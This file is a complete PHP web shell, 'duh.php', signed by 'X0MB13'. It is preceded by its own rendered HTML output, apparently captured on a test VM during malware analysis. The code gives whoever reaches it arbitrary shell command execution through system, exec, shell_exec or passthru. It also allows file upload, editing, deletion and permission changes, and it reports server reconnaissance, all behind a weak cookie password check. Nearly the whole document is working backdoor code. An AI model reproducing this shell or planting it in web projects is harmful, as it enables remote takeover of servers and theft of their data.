{document.getElementById('moreI').style.display="block";}} function xyn(id1,id2) {document.getElementById(id1).style.display="block";document.getElementById(id2).style.display="none";}</script></head><body><h1 id="n"><a href="?x=x"></a></h1><center><p id="menu"><span id="menuB"><<a href="duh.php">Home</a>> <<a href="?x=cmd&d=" var="" www="" html"="">Command</a>> <<a href="?x=php&d=" var="" www="" html"="">PHP</a>> <<a href="javascript:get_inf();">Info</a>> <<a href="?x=q">Logout</a>> </span></p></center><center><p id="inf">||| <b><i><u>Software:</u></i></b> Apache/2.4.52 (Ubuntu) ||| <b><i><u>Uname:</u></i></b> Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 |||<br>||| <b><i><u>User:</u></i></b> osboxes uid:1000 gid:1000 ||| <b><i><u>Safe Mode:</u></i></b> <font color="#ccff00">OFF</font> ||| <b><i><u>Directory: </u></i></b>/var/www/html |||</p></center><hr><table id="moreI"><tbody><tr><td>PHP Version</td><td> :> </td><td> 7.2.34-37+ubuntu22.04.1+deb.sury.org+1</td></tr><tr><td>Zend Version</td><td> :> </td><td> 3.2.0</td></tr><tr><td>Magic Quotes</td><td> :> </td><td> <font color="#ccff00">OFF</font></td></tr><tr><td>Curl</td><td> :> </td><td> <font color="crimson">ON</font></td></tr><tr><td>Register Globals</td><td> :> </td><td> <font color="#ccff00">OFF</font></td></tr><tr><td>OpenBase Dir</td><td> :> </td><td> <font color="#ccff00">OFF</font></td></tr><tr><td>MySQL</td><td> :> </td><td> <font color="#ccff00">OFF</font></td></tr><tr><td>Gzip</td><td> :> </td><td> <font color="crimson">ON</font></td></tr><tr><td>MsSQL</td><td> :> </td><td> <font color="#ccff00">OFF</font></td></tr><tr><td>PostgreSQL</td><td> :> </td><td> <font color="#ccff00">OFF</font></td></tr><tr><td>Oracle</td><td> :> </td><td> <font color="#ccff00">OFF</font></td></tr><tr><td>Total Space</td><td> :> </td><td> 216.08GB</td></tr><tr><td>Used Space</td><td> :> </td><td> 186.76GB</td></tr><tr><td>Your IP</td><td> :> </td><td> ::1</td></tr><tr><td>Server IP</td><td> :> </td><td> ::1</td></tr><tr><td colspan="3" align="center"><a href="?x=phpinf" target="_blank">PHPInfo</a></td></tr></tbody></table><p align="center" id="cp"><a href="?d=/"></a>/<a href="?d=/var/">var</a>/<a href="?d=/var/www/">www</a>/<a href="?d=/var/www/html/">html</a>/</p><table width="90%" align="center" id="lt" cellpadding="0"><tbody><tr><td align="center"><form action="?d=/var/www/html" method="GET">Create Dir: <input type="hidden" name="d" value="/var/www/html" id="lt"><input type="text" value="" name="ndir" id="lt"> <input type="submit" value="Go" id="lt"></form></td><td align="center"><form action="?d=" var="" www="" html"="" method="GET">Create File: <input type="hidden" value="/var/www/html" name="d" id="lt"><input type="hidden" value="c" name="x"><input type="text" value="" name="f" id="lt"> <input type="submit" value="Go" id="lt"></form></td><td align="center"><form action="?x=cmd&d=/var/www/html" method="POST">Command: <input type="text" value="" name="cmd" id="lt"> <input type="submit" value="Go" id="lt"></form></td><td align="center"><form action="?d=/var/www/html" method="POST" enctype="multipart/form-data">Upload: <input type="hidden" value="100000000" name="MAX_FILE_SIZE"><input type="file" name="upfile" id="ltb"> <input type="submit" value="Go" id="lt"></form></td></tr></tbody></table><br><table width="75%" align="center" id="ft"><tbody><tr><td id="fh"><b>Name</b></td><td id="fh" align="center"><b>Permissions</b></td><td id="fh" align="center"><b>Owner</b></td><td id="fh" align="center"><b>Options</b></td></tr><tr id="fn"><td id="fc"><span id="n."><a href="?d=/var/www/html">.</a></span><span id="r." style="display:none;"><form action="?d=/var/www/html" method="POST"><input type="hidden" value="/var/www/html" name="d"> <input type="text" value="." id="lt" name="new"><input type="hidden" value="." name="old"> <input type="submit" id="lt" value="Rename"> <input type="button" id="lt" value="Cancel" onclick="xyn('n.','r.');"></form></span><span id="d." style="display:none;"><form action="?d=/var/www/html" method="GET">Are you Sure?<input type="hidden" value="/var/www/html" name="deld"> <input type="submit" value="Yes" id="lt"> <input type="button" id="lt" value="No" onclick="xyn('n.','d.')"></form></span></td><td id="fc" align="center"><span id="h."><a href="javascript:xyn('c.','h.');"><font color="#ccff00">0777</font></a></span><span id="c." style="display:none;"><form action="?d=/var/www/html" method="GET"><input type="hidden" value="/var/www/html" name="df"><input type="text" value="0777" id="lt" name="ch"> <input type="submit" id="lt" value="Go"> <input type="button" id="lt" value="Cancel" onclick="xyn('h.','c.');"></form></span></td><td id="fc" align="center">root : root</td><td id="fc"></td></tr><tr id="fn"><td id="fc"><span id="n.."><a href="?d=/var/www">..</a></span><span id="r.." style="display:none;"><form action="?d=/var/www/html" method="POST"><input type="hidden" value="/var/www/html" name="d"> <input type="text" value=".." id="lt" name="new"><input type="hidden" value=".." name="old"> <input type="submit" id="lt" value="Rename"> <input type="button" id="lt" value="Cancel" onclick="xyn('n..','r..');"></form></span><span id="d.." style="display:none;"><form action="?d=/var/www/html" method="GET">Are you Sure?<input type="hidden" value="/var/www" name="deld"> <input type="submit" value="Yes" id="lt"> <input type="button" id="lt" value="No" onclick="xyn('n..','d..')"></form></span></td><td id="fc" align="center"><span id="h.."><a href="javascript:xyn('c..','h..');"><font color="#ccff00">0777</font></a></span><span id="c.." style="display:none;"><form action="?d=/var/www/html" method="GET"><input type="hidden" value="/var/www" name="df"><input type="text" value="0777" id="lt" name="ch"> <input type="submit" id="lt" value="Go"> <input type="button" id="lt" value="Cancel" onclick="xyn('h..','c..');"></form></span></td><td id="fc" align="center">root : root</td><td id="fc"></td></tr><tr id="fn"><td id="fc"><span id="nbeneri.se_malware_analysis"><a href="?x=c&d=/var/www/html&f=beneri.se_malware_analysis">beneri.se_malware_analysis</a></span><span id="rbeneri.se_malware_analysis" style="display:none;"><form action="?d=/var/www/html" method="POST"><input type="hidden" value="/var/www/html" name="d"> <input type="text" id="lt" value="beneri.se_malware_analysis" name="new"><input type="hidden" value="beneri.se_malware_analysis" name="old"><input type="submit" id="lt" value="Rename"><input type="button" id="lt" value="Cancel" onclick="xyn('nbeneri.se_malware_analysis','rbeneri.se_malware_analysis');"></form></span><span id="dbeneri.se_malware_analysis" style="display:none;"><form action="?d=/var/www/html" method="GET">Are you Sure?<input type="hidden" value="/var/www/html/beneri.se_malware_analysis" name="delf"> <input type="submit" value="Yes" id="lt"> <input type="button" id="lt" value="No" onclick="xyn('nbeneri.se_malware_analysis','dbeneri.se_malware_analysis')"></form></span></td><td id="fc" align="center"><span id="hbeneri.se_malware_analysis"><a href="javascript:xyn('cbeneri.se_malware_analysis','hbeneri.se_malware_analysis');"><font color="">0644</font></a></span><span id="cbeneri.se_malware_analysis" style="display:none;"><form action="?d=/var/www/html" method="GET"><input type="hidden" value="/var/www/html/beneri.se_malware_analysis" name="df"><input type="text" value="0644" id="lt" name="ch"> <input type="submit" id="lt" value="Go"> <input type="button" id="lt" value="Cancel" onclick="xyn('hbeneri.se_malware_analysis','cbeneri.se_malware_analysis');"></form></span></td><td id="fc" align="center">root : root</td><td id="fc" align="center"><a href="javascript:xyn('rbeneri.se_malware_analysis','nbeneri.se_malware_analysis')">[R]</a> <a href="javascript:xyn('dbeneri.se_malware_analysis','nbeneri.se_malware_analysis');">[D]</a></td></tr><tr id="fn"><td id="fc"><span id="nduh.php"><a href="?x=c&d=/var/www/html&f=duh.php">duh.php</a></span><span id="rduh.php" style="display:none;"><form action="?d=/var/www/html" method="POST"><input type="hidden" value="/var/www/html" name="d"> <input type="text" id="lt" value="duh.php" name="new"><input type="hidden" value="duh.php" name="old"><input type="submit" id="lt" value="Rename"><input type="button" id="lt" value="Cancel" onclick="xyn('nduh.php','rduh.php');"></form></span><span id="dduh.php" style="display:none;"><form action="?d=/var/www/html" method="GET">Are you Sure?<input type="hidden" value="/var/www/html/duh.php" name="delf"> <input type="submit" value="Yes" id="lt"> <input type="button" id="lt" value="No" onclick="xyn('nduh.php','dduh.php')"></form></span></td><td id="fc" align="center"><span id="hduh.php"><a href="javascript:xyn('cduh.php','hduh.php');"><font color="">0664</font></a></span><span id="cduh.php" style="display:none;"><form action="?d=/var/www/html" method="GET"><input type="hidden" value="/var/www/html/duh.php" name="df"><input type="text" value="0664" id="lt" name="ch"> <input type="submit" id="lt" value="Go"> <input type="button" id="lt" value="Cancel" onclick="xyn('hduh.php','cduh.php');"></form></span></td><td id="fc" align="center">osboxes : osboxes</td><td id="fc" align="center"><a href="javascript:xyn('rduh.php','nduh.php')">[R]</a> <a href="javascript:xyn('dduh.php','nduh.php');">[D]</a></td></tr><tr id="fn"></tr></tbody></table><br><br><br></body></html>
<?php
error_reporting(0);
$xyn='tunafeesh';
if(isset($_POST['pass'])) {if($_POST['pass']==$password) {setcookie($xyn, $_POST['pass'], time()+3600);} let_him_in();}
if(!empty($password) && !isset($_COOKIE[$xyn]) or ($_COOKIE[$xyn]!=$password)) {initiate(); die();}
$me=basename(__FILE__);$server_soft=$_SERVER["SERVER_SOFTWARE"];$uname=php_uname();$cur_user=get_current_user().' uid:'.getmyuid().' gid:'.getmygid();$safe_mode=ini_get('safe_mode');$safe_mode=($safe_mode)?('<font color:crimson>ON</font>'):('<font color=#ccff00>OFF</font>');$cwd=getcwd();$bckC='#333333';$txtC='#999999';
$start='<html><head><title>'.getenv('HTTP_HOST').' </title><style>body {background:'.$bckC.';color:'.$txtC.';font-size:9pt;font-family:Trebuchet MS,cursive,sans serif;}h1#n{position:fixed;top:10px;left:10px;text-shadow:0px 0px 5px black;color:#79a317;}h1#nm{text-shadow:0px 0px 5px black;color:#79a317;}a {color:'.$txtC.';text-decoration:none;font-family:Comic Sans Ms,cursive,sans serif;}a:hover {color:#79a317;}hr {background:'.$txtC.';color:black;}p#bck{position:fixed;top:20px;right:20px;}#menu {position:fixed;bottom:0px;width:100%;font-size:13pt;}#menuB {background:'.$bckC.';box-shadow:0px 0px 10px black;border-radius:15px;padding:5px 20px 5px 20px;}table#moreI{font-size:9pt;background:'.$bckC.';border-radius:10px;box-shadow:0px 0px 10px black;padding:5px;position:fixed;bottom:40px;right:40px;display:none;}p#cp {font-size:11pt;}table#lt {font-size:10pt;}input#lt,input#sv {background:'.$bckC.';border-radius:10px;border:1px solid '.$txtC.';color:'.$txtC.';text-align:center;}input#ltb {background:rgba(0,0,0,0);border-radius:10px;color:'.$txtC.';box-shadow:0px 0px 1px '.$txtC.';border:0px solid rgba(0,0,0,0);}table#ft {font-size:9pt;padding:5px;border-radius:10px;box-shadow:0px 0px 10px black;}td#fh {border-bottom:1px solid '.$txtC.';padding-bottom:3px;}tr#fn:hover{box-shadow:0px 0px 5px black;}h3 {text-shadow:0px 0px 4px black;font-size:13pt;}textarea#edit {background:'.$bckC.';color:'.$txtC.';box-shadow:0px 0px 10px black;border-radius:10px;border:none;padding:10px;}</style><script type="text/javascript">function get_inf() {if(document.getElementById(\'moreI\').style.display=="block"){document.getElementById(\'moreI\').style.display="none"}else {document.getElementById(\'moreI\').style.display="block";}} function xyn(id1,id2) {document.getElementById(id1).style.display="block";document.getElementById(id2).style.display="none";}</script></head><body><h1 id="n"><a href="?x=x"></a></h1>';
$menu='<center><p id="menu"><span id="menuB"><<a href="'.$me.'">Home</a>> <<a href="?x=cmd&d="'.realpath('.').'">Command</a>> <<a href="?x=php&d="'.realpath('.').'">PHP</a>> <<a href="javascript:get_inf();">Info</a>> <<a href="?x=q">Logout</a>> </span></p></center>';$end='</body></html>';$inf='<center><p id="inf">||| <b><i><u>Software:</u></i></b> '.$server_soft.' ||| <b><i><u>Uname:</u></i></b> '.$uname.' |||</br>||| <b><i><u>User:</u></i></b> '.$cur_user.' ||| <b><i><u>Safe Mode:</u></i></b> '.$safe_mode.' ||| <b><i><u>Directory: </i></b></u>'.$cwd.' |||</p></center><hr>';
print $start;print $menu;print $inf;
$moreI=array('PHP Version' => phpversion(),'Zend Version' => zend_version(),'Magic Quotes' => magic_quotes(),'Curl' => curl(),'Register Globals' => reg_globals(),'OpenBase Dir' => openbase_dir(),'MySQL' => myql(),'Gzip' => gzip(),'MsSQL' => mssql(),'PostgreSQL' => postgresql(),'Oracle' => oracle(),'Total Space' => h_size(disk_total_space('/')) ,'Used Space' => h_size(disk_free_space('/')),'Your IP' => $_SERVER['REMOTE_ADDR'],'Server IP' => $_SERVER['SERVER_ADDR']);print '<table id="moreI">'; foreach($moreI as $n => $v) {print '<td>'.$n.'</td><td> :> </td><td> '.$v.'</td><tr>';} print '<td colspan=3 align="center"><a href="?x=phpinf" target="_blank">PHPInfo</a></td></table>';
if(isset($_GET['d'])) {chdir($_GET['d']);}
if(isset($_REQUEST['x']))
{
print '<p id="bck"><a href="?d='.realpath('.').'">BACK</a></p>';
switch($_REQUEST['x'])
{
case 'c': if(isset($_POST['edit_form'])){$f=$_GET['f'];$e=fopen($f,'w') or print '<p id="nn">Error Opening File</p>';fwrite($e,$_POST['edit_form']) or print '<p id="nn">Couldn\'t Save File</p>';fclose($e);}print '<center><p>Editing '.$_GET['f'].' ('.perms($_GET['d'] . $_GET['f']).') .</p></br></br><form action="?x=c&d='.realpath('.').'&f='.$_GET['f'].'" method="POST"><textarea cols=90 rows=15 name="edit_form" id="edit">';if(file_exists($_GET['f'])){$c=file($_GET['f']);foreach($c as $l){print htmlspecialchars($l);}}print '</textarea></br></br><input type="submit" value="Save" id="sv"></form></center>';break;
case 'cmd': print '</br></br><center><h3>Execute Command</h3><form action="?x=cmd&d='.realpath('.').'" method="POST"><input type="text" value="" name="cmd" id="lt"> <input type="submit" value="Go" id="lt"></form></br><textarea cols=90 rows=15 id="edit">';if(isset($_POST['cmd'])) {$cmd=$_POST['cmd']; execute(exec_meth(),$cmd);}print '</textarea></center>';break;
case 'php': print '</br></br><center><h3>PHP Code</h3><form action=?x=php&d="'.realpath('.').'" method="POST"><input type="text" value="" name="pcode" id="lt"> <input type="submit" value="Go" id="lt"></form></br><textarea cols=90 rows=15 id="edit">';print '</textarea></center>';break;
case 'phpinf': phpinfo();break;
case 'q': setcookie($xyn,'',time()-3600);let_him_in();break;
case 'x': print '</br></br></br><center><h1 id="nm"></h1><h3>Mail: <a href="mailto:>COM"></a></h3><h3>Twitter: <a href="http://www.twitter.com/X0MB13_" target="_blank"></a></h3><h3>Facebook: <a href="http://www.fb.com/xombie.xombie.7" target="_blank">X0MB13</a></h3></center>';break;
}
}
else
{
if(isset($_GET['d'])) {chdir($_GET['d']);}
if(isset($_GET['ndir'])) {$d=$_GET['d'];$n=$_GET['ndir'];mkdir($d .DIRECTORY_SEPARATOR. $n);}
if(isset($_POST['new'])) {$n=$_POST['new'];$o=$_POST['old'];$d=$_POST['d'];rename($d.DIRECTORY_SEPARATOR.$o,$d.DIRECTORY_SEPARATOR.$n);}
if(isset($_GET['deld'])) {$d=$_GET['deld']; rmdir($d);}
if(isset($_GET['delf'])) {$d=$_GET['delf']; unlink($d);}
if(isset($_GET['ch'])) {$ch=$_GET['ch']; $d=$_GET['df']; chmod($d,$ch);}
if(isset($_FILES['upfile']['name'])) {$d=realpath('.').DIRECTORY_SEPARATOR.basename($_FILES['upfile']['name']);move_uploaded_file($_FILES['upfile']['tmp_name'],$d);}
print '<p align="center" id="cp">'.curpath('').'</p>';
print '<table width=90% align="center" id="lt"cellpadding="0"><td align="center"><form action="?d='.realpath('.').'" method="GET">Create Dir: <input type="hidden" name="d" value="'.realpath('.').'" id="lt"><input type="text" value="" name="ndir" id="lt"> <input type="submit" value="Go" id="lt"></form></td><td align="center"><form action="?d="'.realpath('.').'" method="GET">Create File: <input type="hidden" value="'.realpath('.').'" name="d" id="lt"><input type="hidden" value="c" name="x"><input type="text" value="" name="f" id="lt"> <input type="submit" value="Go" id="lt"></form></td><td align="center"><form action="?x=cmd&d='.realpath('.').'" method="POST">Command: <input type="text" value="" name="cmd" id="lt"> <input type="submit" value="Go" id="lt"></form></td><td align="center"><form action="?d='.realpath('.').'" method="POST" enctype="multipart/form-data">Upload: <input type="hidden" value="100000000" name="MAX_FILE_SIZE"><input type="file" name="upfile" id="ltb"> <input type="submit" value="Go" id="lt"></form></td></table>';
print '</br>';
$filex=array();
$dirx=array();
print '<table width="75%" align="center" id="ft" ><td id="fh"><b>Name</b></td><td id="fh" align="center"><b>Permissions</b></td><td id="fh" align="center"><b>Owner</b></td><td id="fh" align="center"><b>Options</b></td><tr id="fn">';
if($handle=opendir('.')) {while(false !== ($file=readdir($handle))) {if(is_dir($file)) {$dirx[] .= $file;} else {$filex[] .= $file;}}asort($filex);asort($dirx);$i=0;
foreach($dirx as $file) {if(function_exists('posix_getpwuid') && function_exists('posix_getgrgid')) {$own=posix_getpwuid(fileowner($file)); $grp=posix_getgrgid(filegroup($file));} else {$own['name']='???'; $grp['name']='???';} print '<td id="fc"><span id="n'.$file.'"><a href="?d='.realpath($file).'">'.$file.'</a></span><span id="r'.$file.'" style="display:none;"><form action="?d='.realpath('.').'" method="POST"><input type="hidden" value="'.realpath('.').'" name="d"> <input type="text" value="'.$file.'" id="lt" name="new"><input type="hidden" value="'.$file.'" name="old"> <input type="submit" id="lt" value="Rename"> <input type="button" id="lt" value="Cancel" onClick="xyn(\'n'.$file.'\',\'r'.$file.'\');"></form></span><span id="d'.$file.'" style="display:none;"><form action="?d='.realpath('.').'" method="GET">Are you Sure?<input type="hidden" value="'.realpath($file).'" name="deld"> <input type="submit" value="Yes" id="lt"> <input type="button" id="lt" value="No" onClick="xyn(\'n'.$file.'\',\'d'.$file.'\')"></form></span></td><td id="fc" align="center"><span id="h'.$file.'"><a href="javascript:xyn(\'c'.$file.'\',\'h'.$file.'\');"><font color="'.get_color($file).'">'.perms($file).'</font></a></span><span id="c'.$file.'" style="display:none;"><form action="?d='.realpath('.').'" method="GET"><input type="hidden" value="'.realpath($file).'" name="df"><input type="text" value="'.perms($file).'" id="lt" name="ch"> <input type="submit" id="lt" value="Go"> <input type="button" id="lt" value="Cancel" onClick="xyn(\'h'.$file.'\',\'c'.$file.'\');"></form></span></td><td id="fc" align="center">'.$own['name'].' : '.$grp['name'].'</td>'; if($i==0 or $i==1) {print '<td id="fc"></td><tr id="fn">';} else {print '<td id="fc" align="center"><a href="javascript:xyn(\'r'.$file.'\',\'n'.$file.'\')">[R]</a> <a href="javascript:xyn(\'d'.$file.'\',\'n'.$file.'\')">[D]</a></td><tr id="fn">';} $i++;}
foreach($filex as $file) {if(function_exists('posix_getpwuid') && function_exists('posix_getgrgid')) {$own=posix_getpwuid(fileowner($file)); $grp=posix_getgrgid(filegroup($file));} else {$own['name']='???'; $grp['name']='???';} print '<td id="fc"><span id="n'.$file.'"><a href="?x=c&d='.realpath('.').'&f='.$file.'">'.$file.'</a></span><span id="r'.$file.'" style="display:none;"><form action="?d='.realpath('.').'" method="POST"><input type="hidden" value="'.realpath('.').'" name="d"> <input type="text" id="lt" value="'.$file.'" name="new"><input type="hidden" value="'.$file.'" name="old"><input type="submit" id="lt" value="Rename"><input type="button" id="lt" value="Cancel" onClick="xyn(\'n'.$file.'\',\'r'.$file.'\');"></form></span><span id="d'.$file.'" style="display:none;"><form action="?d='.realpath('.').'" method="GET">Are you Sure?<input type="hidden" value="'.realpath($file).'" name="delf"> <input type="submit" value="Yes" id="lt"> <input type="button" id="lt" value="No" onClick="xyn(\'n'.$file.'\',\'d'.$file.'\')"></form></span></td><td id="fc" align="center"><span id="h'.$file.'"><a href="javascript:xyn(\'c'.$file.'\',\'h'.$file.'\');"><font color="'.get_color($file).'">'.perms($file).'</font></a></span><span id="c'.$file.'" style="display:none;"><form action="?d='.realpath('.').'" method="GET"><input type="hidden" value="'.realpath($file).'" name="df"><input type="text" value="'.perms($file).'" id="lt" name="ch"> <input type="submit" id="lt" value="Go"> <input type="button" id="lt" value="Cancel" onClick="xyn(\'h'.$file.'\',\'c'.$file.'\');"></form></span></td><td id="fc" align="center">'.$own['name'].' : '.$grp['name'].'</td><td id="fc" align="center"><a href="javascript:xyn(\'r'.$file.'\',\'n'.$file.'\')">[R]</a> <a href="javascript:xyn(\'d'.$file.'\',\'n'.$file.'\');">[D]</a></td><tr id="fn">';}}
print '</table></br></br></br>';
}
function openbase_dir(){$x=ini_get('open_basedir');if(!$x) {$o='<font color=#ccff00>OFF</font>';}else {$o='<font color=crimson>ON</font>';}return($o);}
function magic_quotes(){$x=get_magic_quotes_gpc();if(empty($x)) {$m='<font color=#ccff00>OFF</font>';}else {$m='<font color=crimson>ON</font>';}return($m);}
function curl(){if(extension_loaded('curl')) {$c='<font color=crimson>ON</font>';}else {$c='<font color=#ccff00>OFF</font>';}return($c);}
function reg_globals(){if(ini_get('reqister_globals')) {$r='<font color=crimson>ON</font>';}else {$r='<font color=#ccff00>OFF</font>';}return($r);}
function oracle(){if(function_exists('ocilogon')) {$o='<font color=crimson>ON</font>';}else {$o='<font color=#ccff00>OFF</font>';}return($o);}
function postgresql(){if(function_exists('pg_connect')) {$p='<font color=crimson>ON</font>';}else {$p='<font color=#ccff00>OFF</font>';}return($p);}
function myql(){if(function_exists('mysql_connect')) {$m='<font color=crimson>ON</font>';}else {$m='<font color=#ccff00>OFF</font>';}return($m);}
function mssql(){if(function_exists('mssql_connect')) {$m='<font color=crimson>ON</font>';}else {$m='<font color=#ccff00>OFF</font>';}return($m);}
function gzip(){if(function_exists('gzencode')) {$m='<font color=crimson>ON</font>';}else {$m='<font color=#ccff00>OFF</font>';}return($m);}
function h_size($s){if($s>=1073741824) {$s=round($s/1073741824*100)/100 .'GB';}elseif($s>=1048576) {$s=round($s/1048576*100)/100 .'MB';}elseif($s>=1024) {$s=round($s/1024*100)/100 .'KB';}else {$s=$s.'B';}return($s);}
function curpath($d){if($d=='') {$d=getcwd();}$p='';$n='';$dx=explode(DIRECTORY_SEPARATOR,$d);for($i=0;$i < count($dx);$i++) {$g=$dx[$i];$p.=$dx[$i] . DIRECTORY_SEPARATOR; $n .='<a href="?d='.$p.'">'.$g.'</a>'.DIRECTORY_SEPARATOR;}return($n);}
function get_color($f){if(is_writable($f)) {$c='#ccff00';}if(!is_writable($f) && is_readable($f)) {$c=''.$txtC.'';}if(!is_writable($f) && !is_readable($f)) {$c='crimson';}return($c);}
function perms($f) {if(file_exists($f)) {return substr(sprintf('%o',fileperms($f)), -4);} else {return '???';}}
function exec_meth() {if(function_exists('passthru')) {$m='passthru';} if(function_exists('exec')) {$m='exec';} if(function_exists('shell_exec')) {$m='shell_exec';} if(function_exists('system')) {$m='system';} if(!isset($m)) {$m='Disabled';} return($m);}
function execute($m,$c) {if($m=='passthru') {passthru($c);} elseif($m=='system') {system($c);} elseif($m=='shell_exec') {print shell_exec($c);} elseif($m=='exec') {exec($c,$r); foreach($r as $o) {print $o.'</br>';}} else {print 'dafuq?';}}
function initiate(){print '<table border=0 width=100% height=100% align=center style="background:#333333;color:silver;"><td valign="middle"><center><form action="'.basename(__FILE__).'" method="POST">Password <input type="password" maxlength="10" name="pass" style="background:#333333;color:silver;border-radius:10px;border:1px solid silver;text-align:center;"> <input type="submit" value=">>" style="background:#333333;color:silver;border-radius:10px;border:1px solid silver;"></form></center></td></table>';}
function let_him_in() { header("Location: ".basename(__FILE__)); }
print $end;
?>